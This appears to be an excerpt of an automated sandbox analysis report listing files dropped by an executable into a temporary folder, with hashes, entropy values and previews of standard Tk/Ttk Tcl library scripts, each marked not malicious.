                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):5176
                                                                                                                                                                                                                                                    Entropy (8bit):4.933519639131517
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:PmpWHrga3awUrH6kdX3pBz6tkm71cHXYV23EmkiYlgfY8:+pWHrP36r6kJ3pBetkm6HXVUmPYlgfY8
                                                                                                                                                                                                                                                    MD5:2DA0A23CC9D6FD970FE00915EA39D8A2
                                                                                                                                                                                                                                                    SHA1:DFE3DC663C19E9A50526A513043D2393869D8F90
                                                                                                                                                                                                                                                    SHA-256:4ADF738B17691489C71C4B9D9A64B12961ADA8667B81856F7ADBC61DFFEADF29
                                                                                                                                                                                                                                                    SHA-512:B458F3D391DF9522D4E7EAE8640AF308B4209CE0D64FD490BFC0177FDE970192295C1EA7229CE36D14FC3E582C7649460B8B7B0214E0FF5629B2B430A99307D4
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# panedwindow.tcl --.#.# This file defines the default bindings for Tk panedwindow widgets and.# provides procedures that help in implementing those bindings...bind Panedwindow <Button-1> { ::tk::panedwindow::MarkSash %W %x %y 1 }.bind Panedwindow <Button-2> { ::tk::panedwindow::MarkSash %W %x %y 0 }..bind Panedwindow <B1-Motion> { ::tk::panedwindow::DragSash %W %x %y 1 }.bind Panedwindow <B2-Motion> { ::tk::panedwindow::DragSash %W %x %y 0 }..bind Panedwindow <ButtonRelease-1> {::tk::panedwindow::ReleaseSash %W 1}.bind Panedwindow <ButtonRelease-2> {::tk::panedwindow::ReleaseSash %W 0}..bind Panedwindow <Motion> { ::tk::panedwindow::Motion %W %x %y }..bind Panedwindow <Leave> { ::tk::panedwindow::Leave %W }..# Initialize namespace.namespace eval ::tk::panedwindow {}..# ::tk::panedwindow::MarkSash --.#.# Handle marking the correct sash for possible dragging.#.# Arguments:.# w..the widget.# x..widget local x coord.# y..widget local y coord.# proxy.whether this should be a prox

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\pkgIndex.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):371
                                                                                                                                                                                                                                                    Entropy (8bit):5.040568626710524
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:Cjtl17nhRVyDBc6ynID/cL4RpncleXN17MQ94cfBIQ0wrof7MQ94cfBIQe8:ot7rhGDO6LYZlmBIgIBIF8
                                                                                                                                                                                                                                                    MD5:383B6D9C1CFCFC8D8CC00DD092EC5BD3
                                                                                                                                                                                                                                                    SHA1:D95B3E09990BDB68AC0E420DD24208C5C639311A
                                                                                                                                                                                                                                                    SHA-256:7B2A0B3FF68F5A1F06DDB876D472C0A3D2C31EB74E75CABD8B4221FA38E8654B
                                                                                                                                                                                                                                                    SHA-512:0906DD93961C498D0A0BC249C4ECDAD6F1A51357B5BDB04B8ED4864C149B0DAE105B79BCE937C64AEAA15D3791AA5284471889DD7404358F9033957A1D8B0066
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:if {[catch {package present Tcl 8.5.0}]} { return }..if {($::tcl_platform(platform) eq "unix") && ([info exists ::env(DISPLAY)]...|| ([info exists ::argv] && ("-display" in $::argv)))} {.. package ifneeded Tk 8.5.19 [list load [file join $dir .. .. bin libtk8.5.dll] Tk]..} else {.. package ifneeded Tk 8.5.19 [list load [file join $dir .. .. bin tk85.dll] Tk]..}..

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\safetk.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:Tcl script, ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7265
                                                                                                                                                                                                                                                    Entropy (8bit):4.8155351114904965
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:keEoaa0QfsimXorjpgj4oN5QeO9yMfUKvLAN6Zo:keEoRHsiWadgku2UeG
                                                                                                                                                                                                                                                    MD5:79D3CAF583DE0D5C68F377475C2F27F6
                                                                                                                                                                                                                                                    SHA1:2C156DD275DCB09D78994B864EB1BEB2FCA69BAE
                                                                                                                                                                                                                                                    SHA-256:B43A52FABF936FB714BED082773968A6B47A2F06838BCB7BD7D08C0E4F7F8EAD
                                                                                                                                                                                                                                                    SHA-512:76406249A6A99E56F0DA7F021FD44A710F5BE9262BA11859E10FCAE3F70BE9E0CC6B575A950142B8A5B33A7661A0B10F2A89350CDCA7BF67D3D862DE3523B8A8
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# safetk.tcl --.#.# Support procs to use Tk in safe interpreters..#.# Copyright (c) 1997 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES...# see safetk.n for documentation..#.#.# Note: It is now ok to let untrusted code being executed.# between the creation of the interp and the actual loading.# of Tk in that interp because the C side Tk_Init will.# now look up the master interp and ask its safe::TkInit.# for the actual parameters to use for it's initialization (if allowed),.# not relying on the slave state..#..# We use opt (optional arguments parsing).package require opt 0.4.1;..namespace eval ::safe {.. # counter for safe toplevels. variable tkSafeId 0.}..#.# tkInterpInit : prepare the slave interpreter for tk loading.# most of the real job is done by loadTk.# returns the slave name (tkInterpInit does).#.proc ::safe::tkInterpIni

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\scale.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7735
                                                                                                                                                                                                                                                    Entropy (8bit):4.926487320842871
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:q1xTLZHLUAp8cZIQ+Umuy9vYE2dLTaQfiwHZeABypyTtB:uUN1Umn2dKuHIpCB
                                                                                                                                                                                                                                                    MD5:E48FC52EA40F6DCD4D81E1C1C193A3A8
                                                                                                                                                                                                                                                    SHA1:6BD9ED59BB709580525E4256C14501BC9E421431
                                                                                                                                                                                                                                                    SHA-256:0567F30FBF9ACFAAE7AA9324B00B8EEA776BF90E976D0621E953D3B84C0CECDE
                                                                                                                                                                                                                                                    SHA-512:125252E83278225785002D87D406E3AF62C8C366881F35E733720DBFB678758CFC280C8542B1E755AE5DCEE54B489AC70022638E0C5C757916B67190ABC0F3D7
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# scale.tcl --.#.# This file defines the default bindings for Tk scale widgets and provides.# procedures that help in implementing the bindings..#.# Copyright (c) 1994 The Regents of the University of California..# Copyright (c) 1994-1995 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..#-------------------------------------------------------------------------.# The code below creates the default class bindings for entries..#-------------------------------------------------------------------------..# Standard Motif bindings:..bind Scale <Enter> {. if {$tk_strictMotif} {..set tk::Priv(activeBg) [%W cget -activebackground]..%W configure -activebackground [%W cget -background]. }. tk::ScaleActivate %W %x %y.}.bind Scale <Motion> {. tk::ScaleActivate %W %x %y.}.bind Scale <Leave> {. if {$tk_strictMotif} {..%W configure -activebackground $tk::Priv(activeBg). }.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\scrlbar.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):12235
                                                                                                                                                                                                                                                    Entropy (8bit):5.000424244081932
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:AfVS+eVIj0DQ0c0tIT4irpQQtfJMZqSwiXEfY4yhIa7yLIVNpIgdWmDN1gFBA:yjwQLsITzGOfmkSwORVqaGcV4q7CBA
                                                                                                                                                                                                                                                    MD5:707E86BF28DE85DFDFBD204886756C37
                                                                                                                                                                                                                                                    SHA1:3AA4EFAAD78D374E5A39DD5F2234F523157E27BD
                                                                                                                                                                                                                                                    SHA-256:B1AC7F4C326D6B1A57ECF775B58A8093B91A0294A96D7A44A81ACE279EE57468
                                                                                                                                                                                                                                                    SHA-512:ECB4F299BF00DDDC1FA0576FB1D086E15E70983D6AD466D43DAF97AD73EFF4934F7DD8D9BE69D5D31AD23F3341B66B60496E81C10B6CC8685C5E38EB627EEFED
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# scrlbar.tcl --.#.# This file defines the default bindings for Tk scrollbar widgets..# It also provides procedures that help in implementing the bindings..#.# Copyright (c) 1994 The Regents of the University of California..# Copyright (c) 1994-1996 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..#-------------------------------------------------------------------------.# The code below creates the default class bindings for scrollbars..#-------------------------------------------------------------------------..# Standard Motif bindings:.if {[tk windowingsystem] eq "x11" || [tk windowingsystem] eq "aqua"} {..bind Scrollbar <Enter> {. if {$tk_strictMotif} {..set tk::Priv(activeBg) [%W cget -activebackground]..%W configure -activebackground [%W cget -background]. }. %W activate [%W identify %x %y].}.bind Scrollbar <Motion> {. %W activate [%W identify %x %y].}..# The

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\spinbox.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):15087
                                                                                                                                                                                                                                                    Entropy (8bit):5.016543299113458
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:aR1uvx3VYxRryqkfYQ1427SCe3bbVFMiop9Y465uaMY+c6RhO1ON6Qb4qRiZ0NPW:MuS3XVF6pl65/YRhO46qz8wdEt
                                                                                                                                                                                                                                                    MD5:BFDE52A662336A590C71948294E904D4
                                                                                                                                                                                                                                                    SHA1:6F14762A91EAC479FA63C60049DA4DA5D38AF2C6
                                                                                                                                                                                                                                                    SHA-256:E69D65C61096377805982CD52B748EE11DA7761AEE122757584D25C2EEB75759
                                                                                                                                                                                                                                                    SHA-512:4ACB4B866A59B9288C4D20800CB91865D101C65D53C51916260BFF7821D107F0ADBBF6E1EC4C34D19CD828C5FCDB1EB408A8EFDC16797F47FD1EAA2B9077E984
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# spinbox.tcl --.#.# This file defines the default bindings for Tk spinbox widgets and provides.# procedures that help in implementing those bindings. The spinbox builds.# off the entry widget, so it can reuse Entry bindings and procedures..#.# Copyright (c) 1992-1994 The Regents of the University of California..# Copyright (c) 1994-1997 Sun Microsystems, Inc..# Copyright (c) 1999-2000 Jeffrey Hobbs.# Copyright (c) 2000 Ajuba Solutions.#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..#-------------------------------------------------------------------------.# Elements of tk::Priv that are used in this file:.#.# afterId -..If non-null, it means that auto-scanning is underway.#...and it gives the "after" id for the next auto-scan.#...command to be executed..# mouseMoved -..Non-zero means the mouse has moved a significant.#...amount since the button went down (so, for example,.#...start dragging out a

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\tclIndex

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):22293
                                                                                                                                                                                                                                                    Entropy (8bit):4.754781774330704
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:edtm3fv2ZzffGIgowSDxD7n2s7AcBnaUuFyLWFot5gzSG3k96vNTWuoJnfOvWhbf:eds3fv2ZzffGIgowSDxD7nd7AcBnahFE
                                                                                                                                                                                                                                                    MD5:CDF95BAC59CD99E61769D91753521781
                                                                                                                                                                                                                                                    SHA1:25C66F8D06275DD8692380193DFCC84230F6C2D0
                                                                                                                                                                                                                                                    SHA-256:9D9A75EBF2F72666CDE7C8E00BB4985A5581B7668F33948B4A25D1E860755F63
                                                                                                                                                                                                                                                    SHA-512:A678F234AC74734831CCC1CDBAD0545770AF91F5FC663908EB19B3AAFD858460A29AC0BB5ADF6863AA674346066B5DD7C8DE9932BC93ACA909D970D21E75FB79
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Tcl autoload index file, version 2.0.# This file is generated by the "auto_mkindex" command.# and sourced to set up indexing information for one or.# more commands. Typically each line is a command that.# sets an element in the auto_index array, where the.# element name is the name of a command and the value is.# a script that loads the command...set auto_index(::tk::dialog::error::Return) [list source [file join $dir bgerror.tcl]].set auto_index(::tk::dialog::error::Details) [list source [file join $dir bgerror.tcl]].set auto_index(::tk::dialog::error::SaveToLog) [list source [file join $dir bgerror.tcl]].set auto_index(::tk::dialog::error::Destroy) [list source [file join $dir bgerror.tcl]].set auto_index(::tk::dialog::error::bgerror) [list source [file join $dir bgerror.tcl]].set auto_index(bgerror) [list source [file join $dir bgerror.tcl]].set auto_index(::tk::ButtonInvoke) [list source [file join $dir button.tcl]].set auto_index(::tk::ButtonAutoInvoke) [list source [file join

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\tearoff.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):5143
                                                                                                                                                                                                                                                    Entropy (8bit):4.671801205676465
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:MgPXEnPQcTtD7zxeHK7ijhgdhAhbbjymL/KK2pLQY4QYNHL43IwzS6ejW:MgPUnPtTtFeqmjhgdhIbbjymL/KKeLQY
                                                                                                                                                                                                                                                    MD5:405AB0EA001287D3304372EC6005E67F
                                                                                                                                                                                                                                                    SHA1:159EBB2B84CABC16EDDB9B5335F2AE2043F46AF7
                                                                                                                                                                                                                                                    SHA-256:CE7B3E10B24C14000B8BDD85B2F5B949B57122467C579B8DA2762AA7CFD9695C
                                                                                                                                                                                                                                                    SHA-512:845ABE6D27D91F2525C513A57E9C001E71BB11CF0E4031B83F57FC54D1C6F941A8B28CA83428125173C7F2A7840214E9DAEA2BB2982C6C232D5DC6648A128452
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# tearoff.tcl --.#.# This file contains procedures that implement tear-off menus..#.# Copyright (c) 1994 The Regents of the University of California..# Copyright (c) 1994-1997 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# ::tk::TearoffMenu --.# Given the name of a menu, this procedure creates a torn-off menu.# that is identical to the given menu (including nested submenus)..# The new torn-off menu exists as a toplevel window managed by the.# window manager. The return value is the name of the new menu..# The window is created at the point specified by x and y.#.# Arguments:.# w -...The menu to be torn-off (duplicated)..# x -...x coordinate where window is created.# y -...y coordinate where window is created..proc ::tk::TearOffMenu {w {x 0} {y 0}} {. # Find a unique name to use for the torn-off menu. Find the first. # ancestor of w that is a toplevel but not a menu,

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\text.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):33953
                                                                                                                                                                                                                                                    Entropy (8bit):4.915282191126566
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:ThUzJSoWjNGbEBFFRzGa4UNKEFx8wredko/gVVqeNi/9bembFWaHnla98ffl2qiR:T80NGQF6+Ndyy+eina98fflAAlde
                                                                                                                                                                                                                                                    MD5:8D93EE56FA849024B4CD2A5CA179CE0F
                                                                                                                                                                                                                                                    SHA1:6AF6154427B2525B6F7D114A7966F11A06F7B609
                                                                                                                                                                                                                                                    SHA-256:F058DEED61688EE9FAF20179B2D7AC7ED5C055FA588942E3CAD0766E4F20AC87
                                                                                                                                                                                                                                                    SHA-512:5278E84A24B64EEB345AD079C346099861C46D77DE5CDD535B1753E638DB6AC7A9910CD4D9E0CB7EA9F8DE09772CB3BB6464341C90CAF30AA9EC36683A2C4FC1
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# text.tcl --.#.# This file defines the default bindings for Tk text widgets and provides.# procedures that help in implementing the bindings..#.# Copyright (c) 1992-1994 The Regents of the University of California..# Copyright (c) 1994-1997 Sun Microsystems, Inc..# Copyright (c) 1998 by Scriptics Corporation..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..#-------------------------------------------------------------------------.# Elements of ::tk::Priv that are used in this file:.#.# afterId -..If non-null, it means that auto-scanning is underway.#...and it gives the "after" id for the next auto-scan.#...command to be executed..# char -..Character position on the line; kept in order.#...to allow moving up or down past short lines while.#...still remembering the desired position..# mouseMoved -..Non-zero means the mouse has moved a significant.#...amount since the button went down (so, for exampl

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\tk.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:Tcl script, ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):18037
                                                                                                                                                                                                                                                    Entropy (8bit):5.011040594036543
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:/SQlIVXSlH462gngqeObubJLwvYmE5h2PQQ86cLVFiB4tdpAL1G0J5hAzUSlmvur:/S+IVilHRkh2PQJJKB4a1u9c0
                                                                                                                                                                                                                                                    MD5:D5F2DAAFB98A0C0915D1CF9DA46937B1
                                                                                                                                                                                                                                                    SHA1:9949F05D8F38339788FE79CC8C5D79A371444E9F
                                                                                                                                                                                                                                                    SHA-256:6851BFAC2FFFE9BAC7C8552B81370DD8BD37EFF1B93489C0590D0C082806AC2F
                                                                                                                                                                                                                                                    SHA-512:799B09D3F3A42001206CF5749C273C7F4ED634D96C61962E2D2A609BCD77C572947308CB52736AA1D8C5F45402D0969AD65B1003E33A28979AB765CC419F5F3A
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# tk.tcl --.#.# Initialization script normally executed in the interpreter for each Tk-based.# application. Arranges class bindings for widgets..#.# Copyright (c) 1992-1994 The Regents of the University of California..# Copyright (c) 1994-1996 Sun Microsystems, Inc..# Copyright (c) 1998-2000 Ajuba Solutions..#.# See the file "license.terms" for information on usage and redistribution of.# this file, and for a DISCLAIMER OF ALL WARRANTIES...package require Tcl 8.5.;# Guard against [source] in an 8.4- interp before....;# using 8.5 [package] features..# Insist on running with compatible version of Tcl.package require Tcl 8.5.0.# Verify that we have Tk binary and script components from the same release.package require -exact Tk 8.5.19..# Create a ::tk namespace.namespace eval ::tk {. # Set up the msgcat commands. namespace eval msgcat {..namespace export mc mcmax. if {[interp issafe] || [catch {package require msgcat}]} {. # The msgcat package is not available. S

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\tkfbox.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:Tcl script, ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):54195
                                                                                                                                                                                                                                                    Entropy (8bit):4.980984810583439
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:arK2vrrHpHxgsOo66U+uDKjrvX8NzpNCHK7fCN4:ar9vrr0Po66U+sK/vmpNCHK7f24
                                                                                                                                                                                                                                                    MD5:38EEC162FAA1C129B10151C0202EE75D
                                                                                                                                                                                                                                                    SHA1:0C1659800A4D0301DBE8953FEFCBA68F7014ABA7
                                                                                                                                                                                                                                                    SHA-256:DE3AFF8A62DF7A9CA1A78466033314B75357D0CA8A21D3DBFB7699E55740F6AB
                                                                                                                                                                                                                                                    SHA-512:58F218B5152520EF8C62C25859227BB1C49DECA6C14A72420B55EE623F6A3BA0268C45B8C4B178B139E2F92D5EA43CF926A850BDD553877D8B0C79328D47ABE4
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# tkfbox.tcl --.#.#.Implements the "TK" standard file selection dialog box. This.#.dialog box is used on the Unix platforms whenever the tk_strictMotif.#.flag is not set..#.#.The "TK" standard file selection dialog box is similar to the.#.file selection dialog box on Win95(TM). The user can navigate.#.the directories by clicking on the folder icons or by.#.selecting the "Directory" option menu. The user can select.#.files by clicking on the file icons or by entering a filename.#.in the "Filename:" entry..#.# Copyright (c) 1994-1998 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..package require Ttk...#----------------------------------------------------------------------.#.#.. I C O N L I S T.#.# This is a pseudo-widget that implements the icon list inside the.# ::tk::dialog::file:: dialog box..#.#----------------------------------------------------------------------..#

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\ttk\altTheme.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3342
                                                                                                                                                                                                                                                    Entropy (8bit):4.893964295093112
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:xICAIX5RupDdMrwuQb8qRZRK9FVGQJFVGQuxzUFIG0usf2kGKQH+n5dvW88L+iSo:hXoFADfVta9DY
                                                                                                                                                                                                                                                    MD5:909F379DB70A6072D49D0B48D07A32FD
                                                                                                                                                                                                                                                    SHA1:D6E0323EB4549327E5A4722015448A80AC3A99E4
                                                                                                                                                                                                                                                    SHA-256:83D9A5889205EE8EAE23E262F15187EEBFE19375BC6C9D464E570CD5FD1F5B2C
                                                                                                                                                                                                                                                    SHA-512:9ECAE6EF7EC784B5104ADFA2EBBB1F33116470BD3A0346D04D945A3A20C569EC052C28BCF4E914F4264D0CA80C27AD5FB43078CFE38318203E5698B6B84D13CC
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# Ttk widget set: Alternate theme.#..namespace eval ttk::theme::alt {.. variable colors. array set colors {..-frame .."#d9d9d9"..-window.."#ffffff"..-darker ."#c3c3c3"..-border.."#414141"..-activebg ."#ececec"..-disabledfg."#a3a3a3"..-selectbg."#4a6984"..-selectfg."#ffffff". }.. ttk::style theme settings alt {...ttk::style configure "." \.. -background .$colors(-frame) \.. -foreground .black \.. -troughcolor.$colors(-darker) \.. -bordercolor.$colors(-border) \.. -selectbackground .$colors(-selectbg) \.. -selectforeground .$colors(-selectfg) \.. -font ..TkDefaultFont \.. ;...ttk::style map "." -background \.. [list disabled $colors(-frame) active $colors(-activebg)] ;..ttk::style map "." -foreground [list disabled $colors(-disabledfg)] ;. ttk::style map "." -embossed [list disabled 1] ;...ttk::style configure TButton \.. -anchor center -width -11 -padding "1 1" \.. -relief raised -shiftrelief 1 \.. -highlightthickness 1 -highligh

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\ttk\aquaTheme.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2001
                                                                                                                                                                                                                                                    Entropy (8bit):4.976834248247965
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:mjP8dTLsQdWyrF4srKp7UPl7UzT7Ub0aeKgNIii6jOMj0b3M+t2bUuERG6dup+Kx:tdlBlblITKleKgNX1gPc+JFzVcX0jX4
                                                                                                                                                                                                                                                    MD5:288F477ED1FBFBB02CF9E35B23878EDB
                                                                                                                                                                                                                                                    SHA1:BBC4AD4A502D52DEDB40D44BBFCB7DA7897BBDC4
                                                                                                                                                                                                                                                    SHA-256:C2D4B12BD82C056B3A1B5C655FFC2D85208DF74C3FA486EF64AADBC64A021F95
                                                                                                                                                                                                                                                    SHA-512:CE28CCFE9F7E16AC5B9E5C8C8A0445ECBAE82493F8A5C779B4FA4E2FD9BA1F7E7D4A644AC6283A104AADE2EF1F5CFAC676B52CC5D700ACF5DF77653006FB9A4B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# Aqua theme (OSX native look and feel).#..namespace eval ttk::theme::aqua {. ttk::style theme settings aqua {...ttk::style configure . \.. -font TkDefaultFont \.. -background systemWindowBody \.. -foreground systemModelessDialogActiveText \.. -selectbackground systemHighlight \.. -selectforeground systemModelessDialogActiveText \.. -selectborderwidth 0 \.. -insertwidth 1...ttk::style map . \.. -foreground {disabled systemModelessDialogInactiveText... background systemModelessDialogInactiveText} \.. -selectbackground {background systemHighlightSecondary... !focus systemHighlightSecondary} \.. -selectforeground {background systemModelessDialogInactiveText... !focus systemDialogActiveText}...# Workaround for #1100117:..# Actually, on Aqua we probably shouldn't stipple images in..# disabled buttons even if it did work.....ttk::style configure . -stipple {}...ttk::style configure TButton -anchor center -width -6..ttk::style configure Toolbutton -

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\ttk\button.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2978
                                                                                                                                                                                                                                                    Entropy (8bit):4.8919006418640265
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:hpNRZ/rtWkRMC0ScGHsAEfKPi7K1MFNQ6z4Dvh8niT6CUI+SfRHThp:DNRZzse1cGH3UvKmFNQ6z2hT6CUI+4Hb
                                                                                                                                                                                                                                                    MD5:EA7CF40852AFD55FFDA9DB29A0E11322
                                                                                                                                                                                                                                                    SHA1:B7B42FAC93E250B54EB76D95048AC3132B10E6D8
                                                                                                                                                                                                                                                    SHA-256:391B6E333D16497C4B538A7BDB5B16EF11359B6E3B508D470C6E3703488E3B4D
                                                                                                                                                                                                                                                    SHA-512:123D78D6AC34AF4833D05814220757DCCF2A9AF4761FE67A8FE5F67A0D258B3C8D86ED346176FFB936AB3717CFD75B4FAB7373F7853D44FA356BE6E3A75E51B9
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
